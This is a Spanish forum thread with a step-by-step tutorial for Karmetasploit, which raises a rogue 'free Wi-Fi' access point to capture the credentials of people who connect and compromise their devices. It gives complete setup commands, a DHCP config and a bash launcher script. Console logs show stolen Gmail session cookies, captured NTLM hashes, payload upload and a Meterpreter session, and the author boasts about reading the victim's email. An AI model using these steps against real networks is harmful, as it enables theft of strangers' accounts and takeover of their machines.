Foro de elhacker.net

Seguridad Informática => Hacking => Mensaje iniciado por: Shell Root en 6 Enero 2010, 02:14 am



Título: [Metasploit] Karmetasploit
Publicado por: Shell Root en 6 Enero 2010, 02:14 am
KARMETASPLOIT

   Karmetasploit sirve para crear puntos de acceso falsos, capturar contraseñas, recopilar infomación, y llevar a los ataques de navegador contralos clientes. Resumiendo: Karmetasploit es una pasada.

CONFIGURACIÓN

   Se necesita una pequeña instalación para poner en marcha Karmetasploit, el primer paso es obterner el plugin para nuestro Metasploit Framework.

Código:
 wget http://metasploit.com/users/hdm/tools/karma.rc 

   Una vez descagado, necesitamos configurar un poco la infraestructura que necesitaremos. Cuando los cientes se conecten al AP falso que tenemos, estarán esperando que se les asigne una IP, por eso necesitamos un pequeño servidor DHCP, así que vamos a instalar dhcpd3-server y a configurarlo.

Código:
 
sudo apt-get install dhcpd3-server
sudo gedit /etc/dhcp3/dhcpd.conf
y lo dejamos así:

Código:
option domain-name-servers 10.0.0.1;

default-lease-time 60;
max-lease-time 72;

ddns-update-style none;

authoritative;

log-facility local7;

subnet 10.0.0.0 netmask 255.255.255.0 {
  range 10.0.0.100 10.0.0.254;
  option routers 10.0.0.1;
  option domain-name-servers 10.0.0.1;
}

   También necesitaremos instalar un par de cositas más.

Código:
 sudo gem install activerecord sqlite3-ruby 

   Ahora estamos preparados para empezar.

EMPEZANDO

   Primero, vamos a poner nuestra tarjeta wireless en modo monitor

Código:
root@trashhgoo:/home/trashhgoo/Hacklab# airmon-ng start wlan0


Found 4 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to kill (some of) them!

PID Name
878 avahi-daemon
879 avahi-daemon
1012 NetworkManager
1041 wpa_supplicant


Interface Chipset Driver

eth1 Unknown wl
wlan0 Ralink 2573 USB rt73usb - [phy0]
(monitor mode enabled on mon0)

root@trashhgoo:/home/trashhgoo/Hacklab#

Como sabréis, airmon-ng nos crea un dispositivo virtual en modo monitor, en este caso mon0, y es sobre el que vamos a levantar el AP.

Código:
root@trashhgoo:/home/trashhgoo/Hacklab# airbase-ng -P -C 30 -e "WIFI_GRATUITO" -v mon0
23:39:19  Created tap interface at0
23:39:19  Trying to set MTU on at0 to 1500
23:39:19  Trying to set MTU on mon0 to 1800
23:39:19  Access Point with BSSID 00:24:01:12:3E:A6 started.

Esto nos creó una interfaz nueva, que está trabajando como AP, en mi caso: at0

¿Qué hacemos ahora? Asignarle una IP y arrancar el servidor DHCP (Asignador de IP's automáticas, para el que no lo sepa) en él, así que abrimos otro shell, dejando el airbase-ng trabajando.

Código:
root@trashhgoo:/home/trashhgoo# ifconfig at0 up 10.0.0.1 netmask 255.255.255.0
root@trashhgoo:/home/trashhgoo# dhcpd3 -cf /etc/dhcp3/dhcpd.conf at0
Internet Systems Consortium DHCP Server V3.1.2
Copyright 2004-2008 Internet Systems Consortium.
All rights reserved.
For info, please visit http://www.isc.org/sw/dhcp/
Wrote 1 leases to leases file.
Listening on LPF/at0/00:24:01:12:3e:a6/10.0.0/24
Sending on   LPF/at0/00:24:01:12:3e:a6/10.0.0/24
Sending on   Socket/fallback/fallback-net
Can't create PID file /var/run/dhcpd.pid: Permission denied.

No le hagáis caso al "Permission denied", es sólo que no pudo crear un archivo (Este dhcpd3 es un protestón).

Pues ya está funcionando! Qué os parece? No es maravilloso?

No?

Bueno, pues entonces vamos a seguir, que hasta ahora sólo lo estábamos preparando.

UTILIZANDO KARMETASPLOIT

Si utilizáis metasploit 3.2, tenéis que guardar karma.rb en la carpeta donde está msfconsole, si usáis la 3.3, tenéis que estar en la carpeta donde lo tenéis guardado o asignar la carpeta donde lo tenemos guardado.

Código:
root@trashhgoo:/home/trashhgoo# cd Hacklab
root@trashhgoo:/home/trashhgoo/Hacklab# ls karma.rc
karma.rc

Lo tenéis? Pues vamos a poner en marcha el chiringuito con un sencillo comando.

Código:
 msfconsole -r karma.rc 

También podría haber puesto msfconsole -r /home/trashhgoo/Hacklab/karma.rc
Y hala! A bailar! Ahora el propio msfconole es el que hará todo!
Empezará a levantar servers, que no son más que trampas para los incautos que se conecten a nuestro AP. Cuando parezca que se para, pulsemos ENTER.

Código:
[*] Started reverse handler on port 3333
[*] Starting the payload handler...
[*] Started reverse handler on port 6666

[*] --- Done, found 14 exploit modules

[*] Using URL: http://0.0.0.0:55550/ads
[*]  Local IP: http://77.209.92.221:55550/ads
[*] Server started.

msf auxiliary(http) >

No os hacéis a una idea de la cantidad de exploits que tenemos cargados, a la espera de que algún incauto pique.

Y qué pasa si pican? Pues lo veremos ahora...

PICARON!!!!

Código:
[*] DNS 10.0.0.100:1276 XID 87 (IN::A www.msn.com)
[*] DNS 10.0.0.100:1276 XID 87 (IN::A www.msn.com)
[*] HTTP REQUEST 10.0.0.100 > www.msn.com:80 GET / Windows IE 5.01 cookies=MC1=V=3&GUID=e2eabc69be554e3587acce84901a53d3;
MUID=E7E065776DBC40099851B16A38DB8275; mh=MSFT; CULTURE=EN-US; zip=z:68101|la:41.26|lo:-96.013|c:US|hr:1; FlightGroupId=14; FlightId=BasePage;
hpsvr=M:5|F:5|T:5|E:5|D:blu|W:F; hpcli=W.H|L.|S.|R.|U.L|C.|H.; ushpwea=wc:USNE0363; wpv=2
[*] DNS 10.0.0.100:1279 XID 88 (IN::A adwords.google.com)
[*] DNS 10.0.0.100:1279 XID 88 (IN::A adwords.google.com)
[*] DNS 10.0.0.100:1280 XID 89 (IN::A blogger.com)
[*] DNS 10.0.0.100:1280 XID 89 (IN::A blogger.com)
[*] DNS 10.0.0.100:1289 XID 95 (IN::A gmail.com)
[*] DNS 10.0.0.100:1289 XID 95 (IN::A gmail.com)
[*] DNS 10.0.0.100:1289 XID 95 (IN::A gmail.com)
[*] DNS 10.0.0.100:1292 XID 96 (IN::A gmail.google.com)
[*] DNS 10.0.0.100:1292 XID 96 (IN::A gmail.google.com)
[*] DNS 10.0.0.100:1292 XID 96 (IN::A gmail.google.com)
[*] DNS 10.0.0.100:1292 XID 96 (IN::A gmail.google.com)
[*] DNS 10.0.0.100:1292 XID 96 (IN::A gmail.google.com)
[*] Request '/ads' from 10.0.0.100:1278
[*] Recording detection from User-Agent
[*] DNS 10.0.0.100:1292 XID 96 (IN::A gmail.google.com)
[*] Browser claims to be MSIE 5.01, running on Windows 2000
[*] DNS 10.0.0.100:1293 XID 97 (IN::A google.com)
[*] Error: SQLite3::SQLException cannot start a transaction within a transaction /usr/lib/ruby/1.8/sqlite3/errors.rb:62:in
`check'/usr/lib/ruby/1.8/sqlite3/ resultset.rb:47:in `check'/usr/lib/ruby/1.8/sqlite3/resultset.rb:39:in `commence'/usr/lib/ruby
1.8/sqlite3
[*] HTTP REQUEST 10.0.0.100 > ecademy.com:80 GET /forms.html Windows IE 5.01 cookies=
[*] HTTP REQUEST 10.0.0.100 > facebook.com:80 GET /forms.html Windows IE 5.01 cookies=
[*] HTTP REQUEST 10.0.0.100 > gather.com:80 GET /forms.html Windows IE 5.01 cookies=
[*] HTTP REQUEST 10.0.0.100 > gmail.com:80 GET /forms.html Windows IE 5.01 cookies=
[*] HTTP REQUEST 10.0.0.100 > gmail.google.com:80 GET /forms.html Windows IE 5.01 cookies=PREF=ID=474686c582f13be6:U=ecaec12d78faa1ba:TM=1241334857:LM=1241334880:S=snePRUjY-
gcXpEV; NID=22=nFGYMj-l7FaT7qz3zwXjen9_miz8RDn_rA-
lP_IbBocsb3m4eFCH6hI1ae23ghwenHaEGltA5hiZbjA2gk8i7m8u9Za718IFyaDEJRw0Ip1sT8uHHsJGTYfpAlne1vB8
[*] HTTP REQUEST 10.0.0.100 > google.com:80 GET /forms.html Windows IE 5.01 cookies=PREF=ID=474686c582f13be6:U=ecaec12d78faa1ba:TM=1241334857:LM=1241334880:S=snePRUjY
zgcXpEV; NID=22=nFGYMj-l7FaT7qz3zwXjen9_miz8RDn_rA-
lP_IbBocsb3m4eFCH6hI1ae23ghwenHaEGltA5hiZbjA2gk8i7m8u9Za718IFyaDEJRw0Ip1sT8uHHsJGTYfpAlne1vB8

Vale, vale, vale... Un momento! Vamos a ver! Qué es todo esto?

Bien, todo esto son los datos que nos está enviando nuestra pesca, y algo interesante es por ejemplo ese par de cookies que nos acaban de regalar.

Código:
[*] HTTP REQUEST 10.0.0.100 > gmail.google.com:80 GET /forms.html Windows IE 5.01 cookies=PREF=ID=474686c582f13be6:U=ecaec12d78faa1ba:TM=1241334857:LM=1241334880:S=snePRUjY
zgcXpEV; NID=22=nFGYMj-l7FaT7qz3zwXjen9_miz8RDn_rA-
lP_IbBocsb3m4eFCH6hI1ae23ghwenHaEGltA5hiZbjA2gk8i7m8u9Za718IFyaDEJRw0Ip1sT8uHHsJGTYfpAlne1vB8
[*] HTTP REQUEST 10.0.0.100 > google.com:80 GET /forms.html Windows IE 5.01 cookies=PREF=ID=474686c582f13be6:U=ecaec12d78faa1ba:TM=1241334857:LM=1241334880:S=snePRUjY-
gcXpEV; NID=22=nFGYMj-l7FaT7qz3zwXjen9_miz8RDn_rA-
lP_IbBocsb3m4eFCH6hI1ae23ghwenHaEGltA5hiZbjA2gk8i7m8u9Za718IFyaDEJRw0Ip1sT8uHHsJGTYfpAlne1vB8

SON PARA GMAIL!! Pues ya podemos acceder a su correo (Risa malévola, sonido de órgano y llamas infernales saliendo del suelo iluminando una sonrisa malvada).

Y aparte de esas pueden aparecernos muchas más, pero... Qué más puede pasar? Pues puede pasar que la pesca sea vulnerable a algún ataque, por lo que obtendríamos lo siguiente:

Código:

[*] Received 10.0.0.100:1362 TARGET\P0WN3D LMHASH:47a8cfba21d8473f9cc1674cedeba0fa6dc1c2a4dd904b72 NTHASH:ea389b305cd095d32124597122324fc470ae8d9205bdfc19 OS:Windows 2000 2195 LM:Windows 2000 5.0
[*] Authenticating to 10.0.0.100 as TARGET\P0WN3D...
[*] HTTP REQUEST 10.0.0.100 > www.myspace.com:80 GET /forms.html Windows IE 5.01 cookies=
[*] AUTHENTICATED as TARGETP0WN3D...
[*] Connecting to the ADMIN$ share...
[*] HTTP REQUEST 10.0.0.100 > www.plaxo.com:80 GET /forms.html Windows IE 5.01 cookies=
[*] Regenerating the payload...
[*] Uploading payload...
[*] HTTP REQUEST 10.0.0.100 > www.ryze.com:80 GET /forms.html Windows IE 5.01 cookies=
[*] HTTP REQUEST 10.0.0.100 > www.slashdot.org:80 GET /forms.html Windows IE 5.01 cookies=
[*] HTTP REQUEST 10.0.0.100 > www.twitter.com:80 GET /forms.html Windows IE 5.01 cookies=
[*] HTTP REQUEST 10.0.0.100 > www.xing.com:80 GET /forms.html Windows IE 5.01 cookies=
[*] HTTP REQUEST 10.0.0.100 > www.yahoo.com:80 GET /forms.html Windows IE 5.01 cookies=
[*] HTTP REQUEST 10.0.0.100 > xing.com:80 GET /forms.html Windows IE 5.01 cookies=
[*] HTTP REQUEST 10.0.0.100 > yahoo.com:80 GET /forms.html Windows IE 5.01 cookies=
[*] Created UxsjordQ.exe...
[*] HTTP REQUEST 10.0.0.100 > ziggs.com:80 GET /forms.html Windows IE 5.01 cookies=
[*] Connecting to the Service Control Manager...
[*] HTTP REQUEST 10.0.0.100 > care.com:80 GET / Windows IE 5.01 cookies=
[*] HTTP REQUEST 10.0.0.100 > www.gather.com:80 GET /forms.html Windows IE 5.01 cookies=
[*] HTTP REQUEST 10.0.0.100 > www.ziggs.com:80 GET /forms.html Windows IE 5.01 cookies=
[*] Obtaining a service manager handle...
[*] Creating a new service...
[*] Closing service handle...
[*] Opening service...
[*] Starting the service...
[*] Transmitting intermediate stager for over-sized stage...(191 bytes)
[*] Removing the service...
[*] Closing service handle...
[*] Deleting UxsjordQ.exe...
[*] Sending Access Denied to 10.0.0.100:1362 TARGET\P0WN3D
[*] Received 10.0.0.100:1362 LMHASH:00 NTHASH: OS:Windows 2000 2195 LM:Windows 2000 5.0
[*] Sending Access Denied to 10.0.0.100:1362
[*] Received 10.0.0.100:1365 TARGET\P0WN3D LMHASH:3cd170ac4f807291a1b90da20bb8eb228cf50aaf5373897d NTHASH:ddb2b9bed56faf557b1a35d3687fc2c8760a5b45f1d1f4cd OS:Windows 2000 2195 LM:Windows 2000 5.0
[*] Authenticating to 10.0.0.100 as TARGET\P0WN3D...
[*] AUTHENTICATED as TARGETP0WN3D...
[*] Ignoring request from 10.0.0.100, attack already in progress.
[*] Sending Access Denied to 10.0.0.100:1365 TARGET\P0WN3D
[*] Sending Apple QuickTime 7.1.3 RTSP URI Buffer Overflow to 10.0.0.100:1278...
[*] Sending stage (2650 bytes)
[*] Sending iPhone MobileSafari LibTIFF Buffer Overflow to 10.0.0.100:1367...
[*] HTTP REQUEST 10.0.0.100 > www.care2.com:80 GET / Windows IE 5.01 cookies=
[*] Sleeping before handling stage...
[*] HTTP REQUEST 10.0.0.100 > www.yahoo.com:80 GET / Windows IE 5.01 cookies=
[*] HTTP REQUEST 10.0.0.100 > yahoo.com:80 GET / Windows IE 5.01 cookies=
[*] Uploading DLL (75787 bytes)...
[*] Upload completed.
[*] Migrating to lsass.exe...
[*] Current server process: rundll32.exe (848)
[*] New server process: lsass.exe (232)
[*] Meterpreter session 1 opened (10.0.0.1:45017 -> 10.0.0.100:1364)

msf auxiliary(http) > sessions -l

Active sessions
===============

  Id  Description  Tunnel                            
  --  -----------  ------                            
  1   Meterpreter  10.0.0.1:45017 -> 10.0.0.100:1364


Oh! Una sesión de meterpreter! Y sin hacer nada! No es estupendo? No, es Karmetasploit.


Fuente: Not Spam http://foro.portalhacker.net/index.php/topic,100592.0.html




Título: Re: [Metasploit] Karmetasploit
Publicado por: TeCh en 6 Enero 2010, 14:17 pm
Jajaja! Muy buen truco master! Te felicito! :D

Aunque tambien se podria hacer un MITM de paso! ;)


Título: Re: [Metasploit] Karmetasploit
Publicado por: trashhgoo en 6 Enero 2010, 15:31 pm
Jajaja! Muy buen truco master! Te felicito! :D

Master? Oish, gracias. =P


Título: Re: [Metasploit] Karmetasploit
Publicado por: d_pit en 7 Enero 2010, 17:03 pm
podriamos hacer esto desde WIN? dentro de los receptores wifi q se pueden poner en modo monitor ...


Título: Re: [Metasploit] Karmetasploit
Publicado por: trashhgoo en 8 Enero 2010, 11:35 am
podriamos hacer esto desde WIN? dentro de los receptores wifi q se pueden poner en modo monitor ...

Lo dudo, no sé cómo puedes configurar el servidor DHCP3 en Windows. Sorry


Título: Re: [Metasploit] Karmetasploit
Publicado por: pepeluxx en 8 Enero 2010, 17:13 pm
Gracias por el aporte. La verdad es que esto tiene más peligro ... jaja

Bueno, el caso es que me da un error al conectar el cliente y no so como solucionarlo. Parece un error de DNS al asignar los datos el servidor DHCP. Alguna sugerencia? gracias

Código:
[-] fakedns: Resolv::DNS::DecodeError non-backward name pointer ["/opt/metasploit3/lib/ruby/1.9.1/resolv.rb:1423:in `get_labels'", "/opt/metasploit3/lib/ruby/1.9.1/resolv.rb:1427:in `get_labels'", "/opt/metasploit3/lib/ruby/1.9.1/resolv.rb:1409:in `get_name'", "/opt/metasploit3/lib/ruby/1.9.1/resolv.rb:1668:in `decode_rdata'", "/opt/metasploit3/lib/ruby/1.9.1/resolv.rb:1451:in `block in get_rr'", "/opt/metasploit3/lib/ruby/1.9.1/resolv.rb:1355:in `get_length16'", "/opt/metasploit3/lib/ruby/1.9.1/resolv.rb:1451:in `get_rr'", "/opt/metasploit3/lib/ruby/1.9.1/resolv.rb:1332:in `block (2 levels) in decode'", "/opt/metasploit3/lib/ruby/1.9.1/resolv.rb:1331:in `each'", "/opt/metasploit3/lib/ruby/1.9.1/resolv.rb:1331:in `block in decode'", "/opt/metasploit3/lib/ruby/1.9.1/resolv.rb:1348:in `initialize'", "/opt/metasploit3/lib/ruby/1.9.1/resolv.rb:1312:in `new'", "/opt/metasploit3/lib/ruby/1.9.1/resolv.rb:1312:in `decode'", "(eval):99:in `run'", "/opt/metasploit3/msf3/lib/msf/base/simple/auxiliary.rb:93:in `job_run_proc'", "/opt/metasploit3/msf3/lib/msf/base/simple/auxiliary.rb:69:in `block in run_simple'", "/opt/metasploit3/msf3/lib/rex/job_container.rb:36:in `call'", "/opt/metasploit3/msf3/lib/rex/job_container.rb:36:in `block in start'"]


Título: Re: [Metasploit] Karmetasploit
Publicado por: trashhgoo en 8 Enero 2010, 19:41 pm
Configuraste correctamente el servidor DHCP3? Ejecutas MSF con privilegios de Root?


Título: Re: [Metasploit] Karmetasploit
Publicado por: pepeluxx en 8 Enero 2010, 20:17 pm
Si, ejecuto la consola de metasploit con root y el dhcp está corriendo bien:

Código:
debian:~# ps -ef |grep dhcpd
root     11476     1  0 17:04 ?        00:00:00 dhcpd3 -cf /etc/dhcp3/dhcpd.conf at0
root     12043  5044  0 20:09 pts/2    00:00:00 grep dhcpd

Lo que si que tengo es una duda con el dhcp-server. El caso es que tengo en el portátil dos wifis, una conectada a Internet y la otra, que es la que pongo en modo monitor.
Antes de poner la segunda en modo monitor, el dhcpd ya está corriendo, por lo que me da el siguiente mensaje:

Código:
debian:~# airmon-ng start wlan1

Found 6 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to kill (some of) them!

PID Name
1730 avahi-daemon
1731 avahi-daemon
2361 wpa_supplicant
10715 NetworkManager
10749 wpa_supplicant
10783 dhclient3
Process with PID 10749 (wpa_supplicant) is running on interface wlan0
Process with PID 10783 (dhclient3) is running on interface wlan0

Interface Chipset Driver

wlan0 Unknown iwlagn - [phy0]
wlan1 ZyDAS 1211 zd1211rw - [phy2]
(monitor mode enabled on mon0)

El mensaje me refiero a:
Código:
Process with PID 10783 (dhclient3) is running on interface wlan0

También he probado a parar el demonio y luego arrancarlo desde el otro interface:
Código:
debian:~# /etc/init.d/dhcp3-server stop

debian:~# ifconfig at0 up 10.0.0.1 netmask 255.255.255.0

debian:~# dhcpd3 -cf /etc/dhcp3/dhcpd.conf at0
Internet Systems Consortium DHCP Server V3.1.3
Copyright 2004-2009 Internet Systems Consortium.
All rights reserved.
For info, please visit https://www.isc.org/software/dhcp/
Wrote 0 leases to leases file.
Listening on LPF/at0/00:02:72:63:6f:db/10.0.0/24
Sending on   LPF/at0/00:02:72:63:6f:db/10.0.0/24
Sending on   Socket/fallback/fallback-net

debian:~# ps -ef | grep dhcpd
root     12701     1  0 20:14 ?        00:00:00 dhcpd3 -cf /etc/dhcp3/dhcpd.conf at0
root     12703  3110  0 20:15 pts/1    00:00:00 grep dhcpd
debian:/home/pepelux/aircrack#

Pero tampoco va y el mensaje de la consola me da que pensar que igual me falta por instalar algún script para las DNSs ...

Gracias


Título: Re: [Metasploit] Karmetasploit
Publicado por: trashhgoo en 8 Enero 2010, 21:32 pm
Pues la verdad es que no termino de entender el error, pero a ver si llegamos a una solución para añadirla en el manual, como posibles errores.

En un principio te diria que hicieras su msfupdate.

El caso es que cuando lo hice por primera vez, me pidio que instalara un par de gems mas, y lo hice, pero no tome nota de ello, y no lo inclui en el manual. Sorry


Título: Re: [Metasploit] Karmetasploit
Publicado por: pepeluxx en 9 Enero 2010, 16:18 pm
Tengo todos los plugins de metasploit actualizados. El problema creo que viene en el dhcpd

La wifi se arranca y me conecto desde otro PC pero no puedo navegar. Lo revisaré a ver ...


Título: Re: [Metasploit] Karmetasploit
Publicado por: trashhgoo en 9 Enero 2010, 17:21 pm
KIETO AHI! SALE LOADING...?

Si la respuesta es SI, es normal, es una web fake k captura las cookies.

Solo aceptamos conexiones entrantes, no ofrecemos una redireccion hacia afuera!


Título: Re: [Metasploit] Karmetasploit
Publicado por: pepeluxx en 9 Enero 2010, 17:28 pm
Hola de nuevo ...

Me he fijado que cuando arranco el dhcpd me dice esto:

Código:
Wrote 1 leases to leases file.

Cuando veo que debe salir esto:

Código:
root@trashhgoo:/home/trashhgoo# dhcpd3 -cf /etc/dhcp3/dhcpd.conf at0
Internet Systems Consortium DHCP Server V3.1.2
Copyright 2004-2008 Internet Systems Consortium.
All rights reserved.
For info, please visit http://www.isc.org/sw/dhcp/
Wrote 1 leases to leases file.

Qué os crea en /var/lib/dhcp3/dhcpd.leasses ???


Título: Re: [Metasploit] Karmetasploit
Publicado por: pepeluxx en 9 Enero 2010, 17:29 pm
Hola de nuevo ...

Me he fijado que cuando arranco el dhcpd me dice esto:

Código:
Wrote 0 leases to leases file.

Cuando veo que debe salir esto:

Código:
root@trashhgoo:/home/trashhgoo# dhcpd3 -cf /etc/dhcp3/dhcpd.conf at0
Internet Systems Consortium DHCP Server V3.1.2
Copyright 2004-2008 Internet Systems Consortium.
All rights reserved.
For info, please visit http://www.isc.org/sw/dhcp/
Wrote 1 leases to leases file.

Qué os crea en /var/lib/dhcp3/dhcpd.leasses ???



Título: Re: [Metasploit] Karmetasploit
Publicado por: trashhgoo en 9 Enero 2010, 17:38 pm
Código:
# The format of this file is documented in the dhcpd.leases(5) manual page.
# This lease file was written by isc-dhcp-V3.1.2

lease 10.0.0.102 {
  starts 2 2010/01/05 22:58:10;
  ends 2 2010/01/05 22:59:22;
  tstp 2 2010/01/05 22:59:22;
  cltt 2 2010/01/05 22:58:10;
  binding state free;
  hardware ethernet 00:21:00:95:26:b3;
}


Título: Re: [Metasploit] Karmetasploit
Publicado por: pepeluxx en 9 Enero 2010, 17:48 pm
Pues a mi no me crea nada ... se supone que 00:21:00:95:26:b3 es la mac de at0 ?


Título: Re: [Metasploit] Karmetasploit
Publicado por: trashhgoo en 9 Enero 2010, 17:58 pm
Estas mirandolo bien? Ejecutandolo con prilevios de administrador?
Por lo que tengo entendido es el archivo donde se guardan los datos de los clientes de la red, de cuando se les asigna una IP.

Así que supongo que /var/lib/dhcp3/dhcpd.leases OJO, ES LEASES, no LEASSES es la tabla ARP. No lo puedo decir a ciencia cierta, es simplemente una suposición.  :silbar:


Título: Re: [Metasploit] Karmetasploit
Publicado por: pepeluxx en 10 Enero 2010, 00:56 am
Pues debía ser cosa de mi linux (o de mi wifi) porque probé en otro PC y va bien :)

gracias


Título: Re: [Metasploit] Karmetasploit
Publicado por: trashhgoo en 10 Enero 2010, 03:55 am
Me alegro de que lo consiguieras, eso es que el tutorial está bien escrito. Muchas gracias a ti.

Un saludo


Título: Re: [Metasploit] Karmetasploit
Publicado por: pepeluxx en 10 Enero 2010, 13:11 pm
No se si lo sabeis pero  es posible modificar la página que sale por defecto (una negra que pone loading ...) cambiando /opt/metasploit3/msf3/data/exploits/capture/http/index.html y personalizarla a nuestro gusto

Además también se pueden personalizar las urls de donde se intenta extraer la cookie con el fichero /opt/metasploit3/msf3/data/exploits/capture/http/sites.txt

Un pequeño script que arrancaría todo de golpe podría ser:

Código:
#!/bin/bash
killall -9 dhcpd3 airbase-ng
airmon-ng start ath0
airbase-ng -P -C 30 -e "WIFI-GRATIS" -v ath1 >/dev/null 2>&1 &
sleep 2
ifconfig at0 up 10.0.0.1 netmask 255.255.255.0
sleep 2
rm /var/lib/dhcp3/dhcpd.leases 2>/dev/null
dhcpd3 -cf /etc/dhcp3/dhcpd.conf at0
msfconsole -r karma.rc

saludos


Título: Re: [Metasploit] Karmetasploit
Publicado por: trashhgoo en 10 Enero 2010, 13:41 pm
Es una buena idea la de facilitar el trabajo con un script. Si no te importa, lo añadiré al tutorial original.  ;-)


Título: Re: [Metasploit] Karmetasploit
Publicado por: pepeluxx en 10 Enero 2010, 15:07 pm
claro :) si lo único que hago es reunir todos los comandos que pusisteis en un único fichero :D


Título: Re: [Metasploit] Karmetasploit
Publicado por: trashhgoo en 11 Enero 2010, 02:33 am
Ya, pero no había pensado en eso. Jaja.  :rolleyes:


Título: Re: [Metasploit] Karmetasploit
Publicado por: elrond30 en 11 Enero 2010, 10:18 am
Hola Shell root:
Quiero analizar varias herramientas que sirvan para hacer lo que el Karmetasploit. Por eso me gustaría preguntarte una cosilla. Como información tan detallada de alguna herramienta solo he encontrado tu manual, me gustaría saber tu opinión si conoces alguna herramienta más de cual es mejor. Al final se trata de identificar posibles ataques a redes inalámbricas, claro que me interesan solo las herramientas de software libre para poder hacer posibles mejoras. Si conoces alguna más indicamelas y tu opinión sobre cual es mejor.
Muchas gracias


Título: Re: [Metasploit] Karmetasploit
Publicado por: Shell Root en 11 Enero 2010, 18:52 pm
Emmm! Perdon pero el tuto no es mio, es de trashhgoo, y aun no lo he probado, asi que no puedo ayudarté, pero seguro que mi amigo trashhgoo SÍ.


Título: Re: [Metasploit] Karmetasploit
Publicado por: elrond30 en 12 Enero 2010, 09:13 am
A perdon, abre mirado mal, pues trashhgoo, el tuto muy bueno, si me puedes contestar a la pregunta que he echo antes para Shell Root te lo agradecería. Yo conozco un poco la herramienta Fake AP, pero me interesa tener alguna opinión sobre cual es mejor para la detección de ataques wifi.
Muchas gracias


Título: Re: [Metasploit] Karmetasploit
Publicado por: trashhgoo en 12 Enero 2010, 10:26 am
Emmm! Perdon pero el tuto no es mio, es de trashhgoo, y aun no lo he probado, asi que no puedo ayudarté, pero seguro que mi amigo trashhgoo SÍ.

Yeah! Karma +1 compañero. ^^

A perdon, abre mirado mal, pues trashhgoo, el tuto muy bueno, si me puedes contestar a la pregunta que he echo antes para Shell Root te lo agradecería. Yo conozco un poco la herramienta Fake AP, pero me interesa tener alguna opinión sobre cual es mejor para la detección de ataques wifi.
Muchas gracias

Veamos, yo creo que para comprobar ataques a redes wifi, con airodump-ng es mas que suficiente, fijándonos en los siguientes detalles:

Red protegida con WEP: Si nos empiezan a inyectar tráfico, veremos que los #Data suben a toda velocidad entre "alguien" conectado a la red y el AP. La verdad es que cuando inyectamos tráfico llamamos muchísimo la atención.

Red protegida con WPA: Pues la verdad, no sé, la gente no suele complicarse mucho, si ven una WPA, simplemente la descartan y van a por otra con WEP, ya que es complicado y poco fructífero romper las WPA. Todo el mundo consigue el handshake, y despues no tiene diccionarios y la fuerza bruta tarda lo suficiente como para ser desesperante.

Karmetasploit es malicioso, muy malicioso, y no le veo utilidad para monitorear redes.

Para la monitorización de redes, te recomiendo airodump-ng y el gran clásico: Kismet

Fake AP? No lo conozco. Es para plataforma Win, supongo... Ahí no te puedo ayudar. Sorry


Título: Re: [Metasploit] Karmetasploit
Publicado por: elrond30 en 12 Enero 2010, 10:57 am
FakeAP es para Linux, sirve bien para lo que quiero hacer, ya que no solo quiero monitorear, sino que lo que pretendo es crear un AP falso y ocultar el verdadero, y luego actuar yo de atacante. El FakeAP crea tantos AP como quieras y además creo que detecta ataques, pero nose cuales detecta y cuales no. Al final lo que pretendo es estudiar un poco más en profundidad el uso de honeypot en redes wifi.


Título: Re: [Metasploit] Karmetasploit
Publicado por: trashhgoo en 12 Enero 2010, 11:12 am
Me parece una estupenda iniciativa, pero no sé hasta qué punto sería útil un honeypot en WiFi.

A todo esto, creo que te capto. Lo que pretendes es que un AP falso suplante a uno verdadero, no? Todo sería crear el AP falso (Yo te recomendaría mejor airbase-ng, ya que los chicos de aircrack-ng han crecido mucho en el wireless) con cifrado WEP, la misma dirección MAC que el verdadero, y con el mismo BSSID, en el mismo canal, y ocultar el BSSID del AP verdadero, aunque no sé, quizá así existan interferencias.

Es algo que no me había planteado, pero creo que sí se podría hacer con Karmetasploit, cambiando la MAC de tu tarjeta wifi con macchanger. No puedo aconsejarte otras herramientas porque las desconozco, pero creo que eso va en otro post.

Un saludo


Título: Re: [Metasploit] Karmetasploit
Publicado por: elrond30 en 12 Enero 2010, 11:21 am
Vale muchas gracias. Esto es parte de un proyecto de investigación que estoy llevando a cabo. Depende como se mire es bastante util, porque una empresa podría crear un AP falso para posibles ataques que pudiera sufrir de gente externa a la empresa. Cuando acabe mi investigación colgare los resultados en un post, aunque eso será en Marzo más o menos.
Muchas gracias


Título: Re: [Metasploit] Karmetasploit
Publicado por: trashhgoo en 12 Enero 2010, 11:41 am
Hmmm... Más bien creo que en las empresas, para evitar problemas de ese tipo, utilizan red cableada, pero bueno.  :silbar:

Pero está muy bien, igual gracias a tu proyecto descubrimos algo interesante.

Suerte con él.

Un saludo


Título: Re: [Metasploit] Karmetasploit
Publicado por: pUzzLe en 12 Enero 2010, 12:58 pm
Felicidades trashhgoo magnifico tuto.

Pero no pillo una cosa, la conexión verdadera es la de tu wifi. Lo que haces es ponerte de sniffer creando un AP falso no?

Una mente mala podría hacer grandes destrozos con este tutorial  :P

saludos


Título: Re: [Metasploit] Karmetasploit
Publicado por: pepeluxx en 12 Enero 2010, 13:19 pm
Pero no pillo una cosa, la conexión verdadera es la de tu wifi. Lo que haces es ponerte de sniffer creando un AP falso no?

En principio con una unica wifi (sin mas conexiones que te den acceso a Internet) te sobra ya que lo único que hace es robar cookies y cuentas sin dar acceso a Internet al usuario.

No obstante, sí que podrías darle acceso a través de otra tarjeta usando las iptables ... algo así:

Código:
sysctl net.ipv4.ip_forward=1
iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE

donde eth0 es la tarjeta que te da acceso a Internet (también podría ser otra wifi en lugar de una ethernet)

Sería necesario además del dhcpd3, instalar bind o cualquier otro servidor DNS para poder resolver nombres de dominio

saludos


Título: Re: [Metasploit] Karmetasploit
Publicado por: S1dD3xt35 en 13 Enero 2010, 02:02 am
esto es de lo mejor lo practicare mas alrrato

gracias men ;-)


Título: Re: [Metasploit] Karmetasploit
Publicado por: R007h en 13 Enero 2010, 03:32 am
hey, shell root, cual es la lisencia de tus tutoriales "[metasploit]" se pueden copiar?? obviamente siempre poniendo el sitio y el autor...



Título: Re: [Metasploit] Karmetasploit
Publicado por: trashhgoo en 18 Enero 2010, 12:10 pm
hey, shell root, cual es la lisencia de tus tutoriales "[metasploit]" se pueden copiar?? obviamente siempre poniendo el sitio y el autor...



Este tutorial es de libre distribución, siempre que se cite al autor (trashhgoo) y la fuente donde fue puesto el tutorial (portalhacker.net).

Saludos


Título: Re: [Metasploit] Karmetasploit
